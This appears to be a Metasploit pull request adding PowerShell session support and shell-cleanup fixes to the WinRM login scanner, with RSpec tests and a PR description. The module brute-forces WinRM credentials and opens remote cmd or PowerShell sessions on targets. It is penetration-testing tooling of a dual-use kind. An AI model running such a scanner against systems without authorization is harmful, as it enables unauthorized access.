+      # a dropped connection or other transport failure during the owner lookup
+      # (e.g. EOFError, Rex::HostUnreachable) can surface as more than just a
+      # WinRMWSManFault, and any of these would otherwise skip
+      # close_powershell_shell and leak the shell on the target.
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} - PowerShell session setup failed: #{e.message}"
+      elog(e.full_message, error: e)
+      close_powershell_shell(shell)
+      return nil
     end
 
     sess = Msf::Sessions::WinrmPowerShell.new(shell)

--- a/modules/auxiliary/scanner/winrm/winrm_login.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_login.rb
@@ -179,11 +179,6 @@ class MetasploitModule < Msf::Auxiliary
     setup_cmd_shell(shell, rhost, rport, endpoint, credential, suggest_powershell: suggest_powershell)
   end
 
-  def session_setup(shell, rhost, rport, endpoint)
-    _status, session = setup_cmd_shell(shell, rhost, rport, endpoint, nil, suggest_powershell: true)
-    session
-  end
-
   def setup_cmd_shell(shell, rhost, rport, _endpoint, credential, suggest_powershell:)
     # Keep cmd.exe as the default for the existing stdin-backed CommandShell
     # behavior and older hosts. Historically, PowerShell v3 on Windows Server
@@ -208,12 +203,14 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def setup_powershell_session(conn, rhost, rport, _endpoint, credential)
+    shell = nil
     begin
       shell = conn.shell(:powershell)
       owner = powershell_owner(shell)
     rescue WinRM::WinRMWSManFault => e
       print_error "#{rhost}:#{rport} - PowerShell runspace CreateShell failed: #{e.fault_description}"
       elog(e.full_message, error: e)
+      close_powershell_shell(shell)
       return nil
     end
 
@@ -238,6 +235,19 @@ class MetasploitModule < Msf::Auxiliary
     end
     owner
   end
+
+  # Close a WinRM PowerShell runspace created by setup_powershell_session
+  # when a later step (e.g. the owner lookup) fails, so the shell doesn't
+  # leak on the target. The shell may already be dead, or unreachable at
+  # this point, so do a best effort and capture exceptions.
+  # rubocop:disable Lint/SuppressedException
+  def close_powershell_shell(shell)
+    return if shell.nil?
+
+    shell.close
+  rescue WinRM::WinRMWSManFault
+  end
+  # rubocop:enable Lint/SuppressedException
 
   def handle_cmd_shell_fault(error, rhost, rport, shell, credential, suggest_powershell:)
     if cmd_shell_access_denied?(error)

--- a/spec/lib/msf/base/sessions/winrm_power_shell_spec.rb
+++ b/spec/lib/msf/base/sessions/winrm_power_shell_spec.rb
@@ -1,0 +1,198 @@
+# frozen_string_literal: true
+
+require 'timeout'
+
+RSpec.describe Msf::Sessions::WinrmPowerShell do
+  let(:events) do
+    double(
+      'events',
+      on_session_command: nil,
+      on_session_interact_completed: nil,
+      on_session_output: nil
+    )
+  end
+
+  let(:sessions) do
+    double(
+      'sessions',
+      deregister: nil
+    )
+  end
+
+  let(:framework) do
+    double(
+      'framework',
+      events: events,
+      sessions: sessions
+    )
+  end
+
+  let(:transport) do
+    double(
+      'transport',
+      peerinfo: '192.0.2.1:5985',
+      localinfo: '192.0.2.2:4444'
+    )
+  end
+
+  let(:scripts) { [] }
+
+  let(:shell) do
+    double(
+      'winrm powershell shell',
+      transport: transport,
+      close: nil
+    ).tap do |mock|
+      allow(mock).to receive(:run) do |script, &block|
+        scripts << script
+        marker_match = script.match(/;'(?<start>[A-Za-z]+)'\n(?<command>.*?)\n'(?<finish>[A-Za-z]+)';\n/m)
+        if marker_match
+          block.call("#{marker_match[:start]}\r\n", nil)
+          block.call("marker-output\r\n", nil)
+          block.call("#{marker_match[:finish]}\r\n", nil)
+        else
+          block.call("stdout\n", nil)
+          block.call(nil, "stderr\n")
+        end
+      end
+    end
+  end
+
+  subject(:session) { Msf::Sessions::WinrmPowerShell.new(shell) }
+
+  before do
+    session.framework = framework
+  end
+
+  describe '.type' do
+    it 'returns powershell' do
+      expect(described_class.type).to eq('powershell')
+    end
+
+    it 'returns a mutable string for session list serialization compatibility' do
+      expect { described_class.type << ' windows' }.not_to raise_error
+    end
+  end
+
+  describe '#type' do
+    it 'returns powershell' do
+      expect(session.type).to eq('powershell')
+    end
+  end
+
+  describe '#platform' do
+    it 'returns windows' do
+      expect(session.platform).to eq('windows')
+    end
+
+    it 'returns a mutable string' do
+      expect(session.platform).not_to be_frozen
+    end
+  end
+
+  describe '#abort_foreground_supported' do
+    it 'is false' do
+      expect(session.abort_foreground_supported).to be(false)
+    end
+  end
+
+  describe '#desc' do
+    it 'returns a session-open description without the session suffix' do
+      expect(session.desc).to eq('WinRM PowerShell')
+    end
+  end
+
+  describe Msf::Sessions::WinrmPowerShell::WinRMPowerShellStreamAdapter do
+    subject(:adapter) { described_class.new(shell, ->(_reason = '') {}) }
+
+    it 'returns peer and local socket information from the WinRM transport' do
+      expect(adapter.peerinfo).to eq('192.0.2.1:5985')
+      expect(adapter.localinfo).to eq('192.0.2.2:4444')
+    end
+
+    it 'runs PowerShell input as a PSRP pipeline and buffers stdout and stderr' do
+      adapter.write("Write-Output stdout\n")
+
+      expect(adapter.get_once(-1, 1)).to eq("stdout\r\nstderr\r\n")
+      expect(shell).to have_received(:run).with("Write-Output stdout\n")
+    end
+
+    it 'closes the WinRM PowerShell shell' do
+      adapter.close
+
+      expect(shell).to have_received(:close)
+    end
+
+    it 'buffers WinRM fault output and ends the session with the fault reason' do
+      fault = wsman_fault('CreateShell failed.')
+      queue = Queue.new
+      faulting_adapter = described_class.new(shell, ->(reason = '') { queue << reason })
+
+      allow(shell).to receive(:run).and_raise(fault)
+
+      faulting_adapter.write("Write-Output stdout\n")
+
+      expect(Timeout.timeout(1) { queue.pop }).to eq('CreateShell failed.')
+      expect(faulting_adapter.get_once(-1, 1)).to eq('CreateShell failed.')
+    end
+  end
+
+  describe '#shell_ended' do
+    it 'stops interaction and deregisters the session with the reason' do
+      session.interacting = true
+
+      session.shell_ended('CreateShell failed.')
+
+      expect(session.interacting).to be(false)
+      expect(events).to have_received(:on_session_interact_completed)
+      expect(sessions).to have_received(:deregister).with(session, 'CreateShell failed.')
+    end
+  end
+
+  describe '#shell_command' do
+    it 'uses the existing PowerShell marker command handling' do
+      expect(session.shell_command('Write-Output marker-output', 1)).to eq("marker-output\r\n")
+      expect(scripts.last).to include('Write-Output marker-output')
+    end
+  end
+
+  describe '#_suspend' do
+    before do
+      allow(session).to receive(:name).and_return('2')
+    end
+
+    it 'does not send Ctrl+Z to WinRM PowerShell when backgrounding is declined' do
+      session.interacting = true
+      allow(session).to receive(:prompt_yesno).with('Background session 2?').and_return(false)
+
+      expect(session.rstream).not_to receive(:write)
+
+      session.send(:_suspend)
+
+      expect(session.interacting).to be(true)
+    end
+
+    it 'backgrounds the session when backgrounding is accepted' do
+      session.interacting = true
+      allow(session).to receive(:prompt_yesno).with('Background session 2?').and_return(true)
+
+      session.send(:_suspend)
+
+      expect(session.interacting).to be(false)
+    end
+  end
+
+  describe '#process_autoruns' do
+    it 'uses CommandShell autoruns without reading a PowerShell payload banner' do
+      expect(session).not_to receive(:shell_read)
+
+      session.process_autoruns({})
+    end
+  end
+
+  def wsman_fault(description)
+    WinRM::WinRMWSManFault.allocate.tap do |fault|
+      allow(fault).to receive(:fault_description).and_return(description)
+    end
+  end
+end

--- a/spec/lib/msf/base/sessions/winrm_power_shell_spec.rb
+++ b/spec/lib/msf/base/sessions/winrm_power_shell_spec.rb
@@ -155,6 +155,31 @@ RSpec.describe Msf::Sessions::WinrmPowerShell do
       expect(Timeout.timeout(1) { queue.pop }).to eq('Pipeline failed.')
       expect(shell).to have_received(:close)
     end
+
+    it 'kills a pending pipeline thread before it can run after close' do
+      pipeline_thread_started = Queue.new
+      continue_pipeline_thread = Queue.new
+      pipeline_thread = nil
+      racing_adapter = described_class.new(shell, ->(_reason = '') {})
+
+      racing_adapter.define_singleton_method(:spawn_thread) do |script, &block|
+        pipeline_thread = Thread.new do
+          pipeline_thread_started << true
+          continue_pipeline_thread.pop
+          block.call(script)
+        end
+      end
+
+      racing_adapter.write("Write-Output stdout\n")
+      Timeout.timeout(1) { pipeline_thread_started.pop }
+
+      racing_adapter.close
+      continue_pipeline_thread << true
+
+      expect(pipeline_thread.join(1)).to eq(pipeline_thread)
+      expect(shell).to have_received(:close)
+      expect(shell).not_to have_received(:run)
+    end
   end
 
   describe '#shell_ended' do

--- a/spec/lib/msf/base/sessions/winrm_power_shell_spec.rb
+++ b/spec/lib/msf/base/sessions/winrm_power_shell_spec.rb
@@ -180,9 +180,8 @@ RSpec.describe Msf::Sessions::WinrmPowerShell do
       expect(shell).to have_received(:close)
       expect(shell).not_to have_received(:run)
     end
-    
-    it 'runs pipelines in the order they were written even if a later pipeline thread reaches the run gate first' d
-o
+
+    it 'runs pipelines in the order they were written even if a later pipeline thread reaches the run gate first' do
       run_order = []
       allow(shell).to receive(:run) do |script, &block|
         run_order << script
@@ -199,7 +198,10 @@ o
       ordering_adapter.define_singleton_method(:spawn_thread) do |script, &block|
         call_count += 1
         if call_count == 1
-          Thread.new { release_first.pop; block.call(script) }
+          Thread.new do
+            release_first.pop
+            block.call(script)
+          end
         else
           Thread.new { block.call(script) }
         end

--- a/spec/lib/msf/base/sessions/winrm_power_shell_spec.rb
+++ b/spec/lib/msf/base/sessions/winrm_power_shell_spec.rb
@@ -135,6 +135,26 @@ RSpec.describe Msf::Sessions::WinrmPowerShell do
       expect(Timeout.timeout(1) { queue.pop }).to eq('CreateShell failed.')
       expect(faulting_adapter.get_once(-1, 1)).to eq('CreateShell failed.')
     end
+
+    it 'still closes the shell when on_shell_ended calls close from the pipeline thread itself' do
+      # Mirrors the real session_ended -> deregister -> cleanup -> close chain,
+      # which runs synchronously on the pipeline thread when a fault ends the
+      # session. #close must not kill its own thread before shell.close runs.
+      fault = wsman_fault('Pipeline failed.')
+      queue = Queue.new
+      self_closing_adapter = nil
+      self_closing_adapter = described_class.new(shell, lambda { |reason = ''|
+        self_closing_adapter.close
+        queue << reason
+      })
+
+      allow(shell).to receive(:run).and_raise(fault)
+
+      self_closing_adapter.write("Write-Output stdout\n")
+
+      expect(Timeout.timeout(1) { queue.pop }).to eq('Pipeline failed.')
+      expect(shell).to have_received(:close)
+    end
   end
 
   describe '#shell_ended' do

--- a/spec/lib/msf/base/sessions/winrm_power_shell_spec.rb
+++ b/spec/lib/msf/base/sessions/winrm_power_shell_spec.rb
@@ -180,6 +180,41 @@ RSpec.describe Msf::Sessions::WinrmPowerShell do
       expect(shell).to have_received(:close)
       expect(shell).not_to have_received(:run)
     end
+    
+    it 'runs pipelines in the order they were written even if a later pipeline thread reaches the run gate first' d
+o
+      run_order = []
+      allow(shell).to receive(:run) do |script, &block|
+        run_order << script
+        block.call("stdout\n", nil)
+      end
+
+      release_first = Queue.new
+      ordering_adapter = described_class.new(shell, ->(_reason = '') {})
+      call_count = 0
+
+      # The first write's pipeline thread is held back after claiming its
+      # ticket; the second write's pipeline thread is left free to run
+      # immediately, so it reaches the ordering gate first if there is one.
+      ordering_adapter.define_singleton_method(:spawn_thread) do |script, &block|
+        call_count += 1
+        if call_count == 1
+          Thread.new { release_first.pop; block.call(script) }
+        else
+          Thread.new { block.call(script) }
+        end
+      end
+
+      ordering_adapter.write('first')
+      ordering_adapter.write('second')
+
+      sleep 0.05
+      expect(run_order).to be_empty
+
+      release_first << true
+      Timeout.timeout(1) { sleep 0.01 until run_order.size == 2 }
+      expect(run_order).to eq(%w[first second])
+    end
   end
 
   describe '#shell_ended' do

--- a/spec/lib/net/winrm/connection_spec.rb
+++ b/spec/lib/net/winrm/connection_spec.rb
@@ -1,0 +1,42 @@
+# frozen_string_literal: true
+
+require 'net/winrm/connection'
+
+RSpec.describe Net::MsfWinRM::RexWinRMConnection::ShellFactory do
+  subject(:factory) { described_class.new(connection_opts, transport, logger) }
+
+  let(:connection_opts) do
+    {
+      endpoint: 'http://192.0.2.10:5985/wsman',
+      retry_delay: 1,
+      retry_limit: 0
+    }
+  end
+
+  let(:logger) { double('logger') }
+  let(:transport) { double('transport') }
+
+  describe '#create_shell' do
+    it 'creates the Rex stdin shell for stdin shell requests' do
+      expect(factory.create_shell(:stdin)).to be_a(Net::MsfWinRM::StdinShell)
+    end
+
+    it 'creates the Rex-safe PowerShell shell for PowerShell requests' do
+      expect(factory.create_shell(:powershell)).to be_a(Net::MsfWinRM::PowerShell)
+    end
+
+    it 'delegates other shell types to the upstream factory' do
+      expect(factory.create_shell(:cmd)).to be_a(WinRM::Shells::Cmd)
+    end
+
+    it 'does not register ObjectSpace finalizers for PowerShell shells' do
+      shell = factory.create_shell(:powershell)
+
+      expect(ObjectSpace).not_to receive(:define_finalizer)
+      expect(ObjectSpace).not_to receive(:undefine_finalizer)
+
+      shell.add_finalizer
+      shell.remove_finalizer
+    end
+  end
+end

--- a/spec/modules/auxiliary/scanner/winrm/winrm_login_spec.rb
+++ b/spec/modules/auxiliary/scanner/winrm/winrm_login_spec.rb
@@ -1,0 +1,201 @@
+# frozen_string_literal: true
+
+require 'rspec'
+
+RSpec.describe 'WinRM Login Scanner' do
+  include_context 'Msf::Simple::Framework#modules loading'
+
+  subject(:mod) do
+    load_and_create_module(
+      module_type: 'auxiliary',
+      reference_name: 'scanner/winrm/winrm_login'
+    )
+  end
+
+  let(:credential) do
+    double(
+      'credential',
+      public: username,
+      private: password
+    )
+  end
+
+  let(:conn) { double('winrm connection') }
+  let(:cmd_shell) { double('cmd shell', owner: owner, connection_opts: { user: username }) }
+  let(:ps_shell) { double('powershell shell') }
+  let(:cmd_session) { double('cmd session') }
+  let(:ps_session) { double('powershell session') }
+  let(:command_id) { 'command-id' }
+  let(:owner) { 'EIGHTEEN\\adam.scott' }
+  let(:password) { 'iloveyou1' }
+  let(:rhost) { '192.0.2.10' }
+  let(:rport) { 5985 }
+  let(:endpoint) { 'http://192.0.2.10:5985/wsman' }
+  let(:username) { 'adam.scott' }
+
+  describe 'SessionType option' do
+    it 'defaults to cmd' do
+      expect(mod.datastore['SessionType']).to eq('cmd')
+    end
+
+    it 'accepts cmd, powershell, and auto' do
+      expect(mod.options['SessionType'].enums).to eq(%w[cmd powershell auto])
+    end
+  end
+
+  describe '#create_winrm_session' do
+    before do
+      allow(mod).to receive(:wlog)
+      allow(mod).to receive(:elog)
+    end
+
+    context 'when SessionType is cmd' do
+      before do
+        mod.datastore['SessionType'] = 'cmd'
+      end
+
+      it 'creates the existing stdin cmd shell session' do
+        expect(conn).to receive(:shell).with(:stdin, {}).and_return(cmd_shell)
+        expect(conn).not_to receive(:shell).with(:powershell)
+        expect(cmd_shell).to receive(:send_command).with('cmd.exe').and_return(command_id)
+        expect(Msf::Sessions::WinrmCommandShell).to receive(:new).with(cmd_shell, command_id).and_return(cmd_session)
+        expect(cmd_session).to receive(:platform=).with('windows')
+        expect(mod).to receive(:start_session).with(
+          mod,
+          "WinRM #{username}:#{password} (#{owner})",
+          hash_including('USERNAME' => username, 'PASSWORD' => password),
+          false,
+          nil,
+          cmd_session
+        ).and_return(cmd_session)
+
+        expect(mod.send(:create_winrm_session, conn, credential, rhost, rport, endpoint)).to eq(cmd_session)
+      end
+
+      it 'prints a cmd CreateShell access denied warning with a SessionType hint' do
+        fault = access_denied_fault
+        expect(conn).to receive(:shell).with(:stdin, {}).and_raise(fault)
+        expect(conn).not_to receive(:shell).with(:powershell)
+        expect(mod).to receive(:print_warning).with(
+          "#{rhost}:#{rport} - Credentials were correct, but WinRM cmd shell CreateShell was denied for user: #{username}. Try setting SessionType to powershell or auto."
+        )
+
+        expect(mod.send(:create_winrm_session, conn, credential, rhost, rport, endpoint)).to be_nil
+      end
+    end
+
+    context 'when SessionType is powershell' do
+      before do
+        mod.datastore['SessionType'] = 'powershell'
+      end
+
+      it 'creates a WinRM PowerShell session' do
+        expect(conn).to receive(:shell).with(:powershell).and_return(ps_shell)
+        expect(conn).not_to receive(:shell).with(:stdin, {})
+        expect(mod).to receive(:powershell_owner).with(ps_shell).and_return(owner)
+        expect(Msf::Sessions::WinrmPowerShell).to receive(:new).with(ps_shell).and_return(ps_session)
+        expect(mod).to receive(:start_session).with(
+          mod,
+          "WinRM PowerShell #{username}:#{password} (#{owner})",
+          hash_including('USERNAME' => username, 'PASSWORD' => password),
+          false,
+          nil,
+          ps_session
+        ).and_return(ps_session)
+
+        expect(mod.send(:create_winrm_session, conn, credential, rhost, rport, endpoint)).to eq(ps_session)
+      end
+    end
+
+    context 'when SessionType is auto' do
+      before do
+        mod.datastore['SessionType'] = 'auto'
+      end
+
+      it 'does not try PowerShell when the cmd shell succeeds' do
+        expect(conn).to receive(:shell).with(:stdin, {}).and_return(cmd_shell)
+        expect(conn).not_to receive(:shell).with(:powershell)
+        expect(cmd_shell).to receive(:send_command).with('cmd.exe').and_return(command_id)
+        expect(Msf::Sessions::WinrmCommandShell).to receive(:new).with(cmd_shell, command_id).and_return(cmd_session)
+        expect(cmd_session).to receive(:platform=).with('windows')
+        expect(mod).to receive(:start_session).and_return(cmd_session)
+
+        expect(mod.send(:create_winrm_session, conn, credential, rhost, rport, endpoint)).to eq(cmd_session)
+      end
+
+      it 'falls back to PowerShell on cmd CreateShell access denied' do
+        fault = access_denied_fault
+        expect(conn).to receive(:shell).with(:stdin, {}).and_raise(fault)
+        expect(mod).to receive(:print_warning).with(
+          "#{rhost}:#{rport} - Credentials were correct, but WinRM cmd shell CreateShell was denied for user: #{username}"
+        )
+        expect(mod).to receive(:print_status).with(
+          "#{rhost}:#{rport} - Falling back to a WinRM PowerShell session because cmd shell CreateShell was denied"
+        )
+        expect(conn).to receive(:shell).with(:powershell).and_return(ps_shell)
+        expect(mod).to receive(:powershell_owner).with(ps_shell).and_return(owner)
+        expect(Msf::Sessions::WinrmPowerShell).to receive(:new).with(ps_shell).and_return(ps_session)
+        expect(mod).to receive(:start_session).and_return(ps_session)
+
+        expect(mod.send(:create_winrm_session, conn, credential, rhost, rport, endpoint)).to eq(ps_session)
+      end
+
+      it 'falls back to PowerShell on cmd.exe CreateShell access denied' do
+        fault = access_denied_fault
+        expect(conn).to receive(:shell).with(:stdin, {}).and_return(cmd_shell)
+        expect(cmd_shell).to receive(:send_command).with('cmd.exe').and_raise(fault)
+        expect(mod).to receive(:print_warning).with(
+          "#{rhost}:#{rport} - Credentials were correct, but WinRM cmd shell CreateShell was denied for user: #{username}"
+        )
+        expect(mod).to receive(:print_status).with(
+          "#{rhost}:#{rport} - Falling back to a WinRM PowerShell session because cmd shell CreateShell was denied"
+        )
+        expect(conn).to receive(:shell).with(:powershell).and_return(ps_shell)
+        expect(mod).to receive(:powershell_owner).with(ps_shell).and_return(owner)
+        expect(Msf::Sessions::WinrmPowerShell).to receive(:new).with(ps_shell).and_return(ps_session)
+        expect(mod).to receive(:start_session).and_return(ps_session)
+
+        expect(mod.send(:create_winrm_session, conn, credential, rhost, rport, endpoint)).to eq(ps_session)
+      end
+
+      it 'does not fall back to PowerShell when session registration raises a WSMan fault' do
+        fault = access_denied_fault
+        expect(conn).to receive(:shell).with(:stdin, {}).and_return(cmd_shell)
+        expect(conn).not_to receive(:shell).with(:powershell)
+        expect(cmd_shell).to receive(:send_command).with('cmd.exe').and_return(command_id)
+        expect(Msf::Sessions::WinrmCommandShell).to receive(:new).with(cmd_shell, command_id).and_return(cmd_session)
+        expect(cmd_session).to receive(:platform=).with('windows')
+        expect(mod).to receive(:start_session).and_raise(fault)
+
+        expect do
+          mod.send(:create_winrm_session, conn, credential, rhost, rport, endpoint)
+        end.to raise_error(WinRM::WinRMWSManFault)
+      end
+
+      it 'does not fall back to PowerShell on other cmd shell failures' do
+        fault = wsman_fault('1234', 'Unexpected WSMan fault.')
+        expect(conn).to receive(:shell).with(:stdin, {}).and_raise(fault)
+        expect(conn).not_to receive(:shell).with(:powershell)
+        expect(mod).to receive(:print_error).with("#{rhost}:#{rport} - Unexpected WSMan fault.")
+
+        expect(mod.send(:create_winrm_session, conn, credential, rhost, rport, endpoint)).to be_nil
+      end
+    end
+  end
+
+  def access_denied_fault
+    wsman_fault(
+      ::WindowsError::Win32::ERROR_ACCESS_DENIED.value.to_s,
+      'Access is denied.',
+      'CreateShell failed: 5: Access is denied.'
+    )
+  end
+
+  def wsman_fault(code, description, full_message = description)
+    WinRM::WinRMWSManFault.allocate.tap do |fault|
+      allow(fault).to receive(:fault_code).and_return(code)
+      allow(fault).to receive(:fault_description).and_return(description)
+      allow(fault).to receive(:full_message).and_return(full_message)
+    end
+  end
+end

--- a/spec/modules/auxiliary/scanner/winrm/winrm_login_spec.rb
+++ b/spec/modules/auxiliary/scanner/winrm/winrm_login_spec.rb
@@ -105,6 +105,16 @@ RSpec.describe 'WinRM Login Scanner' do
 
         expect(mod.send(:create_winrm_session, conn, credential, rhost, rport, endpoint)).to eq(ps_session)
       end
+
+      it 'closes the PowerShell shell when the owner lookup fails after CreateShell succeeds' do
+        fault = wsman_fault('1234', 'Pipeline failed.')
+        expect(conn).to receive(:shell).with(:powershell).and_return(ps_shell)
+        expect(mod).to receive(:powershell_owner).with(ps_shell).and_raise(fault)
+        expect(mod).to receive(:print_error).with("#{rhost}:#{rport} - PowerShell runspace CreateShell failed: Pipeline failed.")
+        expect(ps_shell).to receive(:close)
+
+        expect(mod.send(:create_winrm_session, conn, credential, rhost, rport, endpoint)).to be_nil
+      end
     end
 
     context 'when SessionType is auto' do

--- a/spec/modules/auxiliary/scanner/winrm/winrm_login_spec.rb
+++ b/spec/modules/auxiliary/scanner/winrm/winrm_login_spec.rb
@@ -116,6 +116,25 @@ RSpec.describe 'WinRM Login Scanner' do
 
         expect(mod.send(:create_winrm_session, conn, credential, rhost, rport, endpoint)).to be_nil
       end
+      it 'closes the PowerShell shell when the owner lookup drops the connection with an EOFError' do
+        expect(conn).to receive(:shell).with(:powershell).and_return(ps_shell)
+        expect(mod).to receive(:powershell_owner).with(ps_shell).and_raise(EOFError, 'end of file reached')
+        expect(mod).to receive(:print_error).with("#{authority} - PowerShell session setup failed: end of file reac
+hed")
+        expect(ps_shell).to receive(:close)
+
+        expect(mod.send(:create_winrm_session, conn, credential, rhost, rport, endpoint)).to be_nil
+      end
+
+      it 'closes the PowerShell shell when the owner lookup raises Rex::HostUnreachable' do
+        expect(conn).to receive(:shell).with(:powershell).and_return(ps_shell)
+        expect(mod).to receive(:powershell_owner).with(ps_shell).and_raise(Rex::HostUnreachable.new(rhost))
+        expect(mod).to receive(:print_error).with("#{authority} - PowerShell session setup failed: The host (#{rhos
+t}) was unreachable.")
+        expect(ps_shell).to receive(:close)
+
+        expect(mod.send(:create_winrm_session, conn, credential, rhost, rport, endpoint)).to be_nil
+      end
     end
 
     context 'when SessionType is auto' do

--- a/spec/modules/auxiliary/scanner/winrm/winrm_login_spec.rb
+++ b/spec/modules/auxiliary/scanner/winrm/winrm_login_spec.rb
@@ -30,6 +30,7 @@ RSpec.describe 'WinRM Login Scanner' do
   let(:password) { 'iloveyou1' }
   let(:rhost) { '192.0.2.10' }
   let(:rport) { 5985 }
+  let(:authority) { Rex::Socket.to_authority(rhost, rport) }
   let(:endpoint) { 'http://192.0.2.10:5985/wsman' }
   let(:username) { 'adam.scott' }
 
@@ -77,7 +78,7 @@ RSpec.describe 'WinRM Login Scanner' do
         expect(conn).to receive(:shell).with(:stdin, {}).and_raise(fault)
         expect(conn).not_to receive(:shell).with(:powershell)
         expect(mod).to receive(:print_warning).with(
-          "#{rhost}:#{rport} - Credentials were correct, but WinRM cmd shell CreateShell was denied for user: #{username}. Try setting SessionType to powershell or auto."
+          "#{authority} - Credentials were correct, but WinRM cmd shell CreateShell was denied for user: #{username}. Try setting SessionType to powershell or auto."
         )
 
         expect(mod.send(:create_winrm_session, conn, credential, rhost, rport, endpoint)).to be_nil
@@ -110,7 +111,7 @@ RSpec.describe 'WinRM Login Scanner' do
         fault = wsman_fault('1234', 'Pipeline failed.')
         expect(conn).to receive(:shell).with(:powershell).and_return(ps_shell)
         expect(mod).to receive(:powershell_owner).with(ps_shell).and_raise(fault)
-        expect(mod).to receive(:print_error).with("#{rhost}:#{rport} - PowerShell runspace CreateShell failed: Pipeline failed.")
+        expect(mod).to receive(:print_error).with("#{authority} - PowerShell session setup failed: Pipeline failed.")
         expect(ps_shell).to receive(:close)
 
         expect(mod.send(:create_winrm_session, conn, credential, rhost, rport, endpoint)).to be_nil
@@ -137,10 +138,10 @@ RSpec.describe 'WinRM Login Scanner' do
         fault = access_denied_fault
         expect(conn).to receive(:shell).with(:stdin, {}).and_raise(fault)
         expect(mod).to receive(:print_warning).with(
-          "#{rhost}:#{rport} - Credentials were correct, but WinRM cmd shell CreateShell was denied for user: #{username}"
+          "#{authority} - Credentials were correct, but WinRM cmd shell CreateShell was denied for user: #{username}"
         )
         expect(mod).to receive(:print_status).with(
-          "#{rhost}:#{rport} - Falling back to a WinRM PowerShell session because cmd shell CreateShell was denied"
+          "#{authority} - Falling back to a WinRM PowerShell session because cmd shell CreateShell was denied"
         )
         expect(conn).to receive(:shell).with(:powershell).and_return(ps_shell)
         expect(mod).to receive(:powershell_owner).with(ps_shell).and_return(owner)
@@ -155,10 +156,10 @@ RSpec.describe 'WinRM Login Scanner' do
         expect(conn).to receive(:shell).with(:stdin, {}).and_return(cmd_shell)
         expect(cmd_shell).to receive(:send_command).with('cmd.exe').and_raise(fault)
         expect(mod).to receive(:print_warning).with(
-          "#{rhost}:#{rport} - Credentials were correct, but WinRM cmd shell CreateShell was denied for user: #{username}"
+          "#{authority} - Credentials were correct, but WinRM cmd shell CreateShell was denied for user: #{username}"
         )
         expect(mod).to receive(:print_status).with(
-          "#{rhost}:#{rport} - Falling back to a WinRM PowerShell session because cmd shell CreateShell was denied"
+          "#{authority} - Falling back to a WinRM PowerShell session because cmd shell CreateShell was denied"
         )
         expect(conn).to receive(:shell).with(:powershell).and_return(ps_shell)
         expect(mod).to receive(:powershell_owner).with(ps_shell).and_return(owner)
@@ -186,9 +187,30 @@ RSpec.describe 'WinRM Login Scanner' do
         fault = wsman_fault('1234', 'Unexpected WSMan fault.')
         expect(conn).to receive(:shell).with(:stdin, {}).and_raise(fault)
         expect(conn).not_to receive(:shell).with(:powershell)
-        expect(mod).to receive(:print_error).with("#{rhost}:#{rport} - Unexpected WSMan fault.")
+        expect(mod).to receive(:print_error).with("#{authority} - Unexpected WSMan fault.")
 
         expect(mod.send(:create_winrm_session, conn, credential, rhost, rport, endpoint)).to be_nil
+      end
+
+      context 'with an IPv6 target' do
+        let(:rhost) { '2001:db8::10' }
+
+        it 'formats fallback messages with bracketed host and port' do
+          fault = access_denied_fault
+          expect(conn).to receive(:shell).with(:stdin, {}).and_raise(fault)
+          expect(mod).to receive(:print_warning).with(
+            "[2001:db8::10]:#{rport} - Credentials were correct, but WinRM cmd shell CreateShell was denied for user: #{username}"
+          )
+          expect(mod).to receive(:print_status).with(
+            "[2001:db8::10]:#{rport} - Falling back to a WinRM PowerShell session because cmd shell CreateShell was denied"
+          )
+          expect(conn).to receive(:shell).with(:powershell).and_return(ps_shell)
+          expect(mod).to receive(:powershell_owner).with(ps_shell).and_return(owner)
+          expect(Msf::Sessions::WinrmPowerShell).to receive(:new).with(ps_shell).and_return(ps_session)
+          expect(mod).to receive(:start_session).and_return(ps_session)
+
+          expect(mod.send(:create_winrm_session, conn, credential, rhost, rport, endpoint)).to eq(ps_session)
+        end
       end
     end
   end

--- a/spec/modules/auxiliary/scanner/winrm/winrm_login_spec.rb
+++ b/spec/modules/auxiliary/scanner/winrm/winrm_login_spec.rb
@@ -119,8 +119,7 @@ RSpec.describe 'WinRM Login Scanner' do
       it 'closes the PowerShell shell when the owner lookup drops the connection with an EOFError' do
         expect(conn).to receive(:shell).with(:powershell).and_return(ps_shell)
         expect(mod).to receive(:powershell_owner).with(ps_shell).and_raise(EOFError, 'end of file reached')
-        expect(mod).to receive(:print_error).with("#{authority} - PowerShell session setup failed: end of file reac
-hed")
+        expect(mod).to receive(:print_error).with("#{authority} - PowerShell session setup failed: end of file reached")
         expect(ps_shell).to receive(:close)
 
         expect(mod.send(:create_winrm_session, conn, credential, rhost, rport, endpoint)).to be_nil
@@ -129,8 +128,7 @@ hed")
       it 'closes the PowerShell shell when the owner lookup raises Rex::HostUnreachable' do
         expect(conn).to receive(:shell).with(:powershell).and_return(ps_shell)
         expect(mod).to receive(:powershell_owner).with(ps_shell).and_raise(Rex::HostUnreachable.new(rhost))
-        expect(mod).to receive(:print_error).with("#{authority} - PowerShell session setup failed: The host (#{rhos
-t}) was unreachable.")
+        expect(mod).to receive(:print_error).with("#{authority} - PowerShell session setup failed: The host (#{rhost}) was unreachable.")
         expect(ps_shell).to receive(:close)
 
         expect(mod.send(:create_winrm_session, conn, credential, rhost, rport, endpoint)).to be_nil


### PR DESCRIPTION
This adds a `SessionType` option to `auxiliary/scanner/winrm/winrm_login` so successful WinRM logins can create either the existing cmd-backed shell, a PSRP-backed PowerShell session, or automatically fall back to PowerShell when cmd shell creation is denied.

The default remains `cmd`, so existing behavior is preserved unless the user opts into `powershell` or `auto`.

The PowerShell path uses a Rex-safe WinRM PowerShell shell wrapper to avoid upstream finalizers during Rex HTTP cleanup. The `auto` path only falls back for cmd CreateShell / `cmd.exe` access denied errors.


## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use scanner/winrm/winrm_login`
- [x] Hack The Box Eighteen target, or Windows environment with WinRM enabled


## Testing


```
msf > use scanner/winrm/winrm_login
msf auxiliary(scanner/winrm/winrm_login) > show options

Module options (auxiliary/scanner/winrm/winrm_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   CreateSession     true             no        Create a new session for every successful login
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
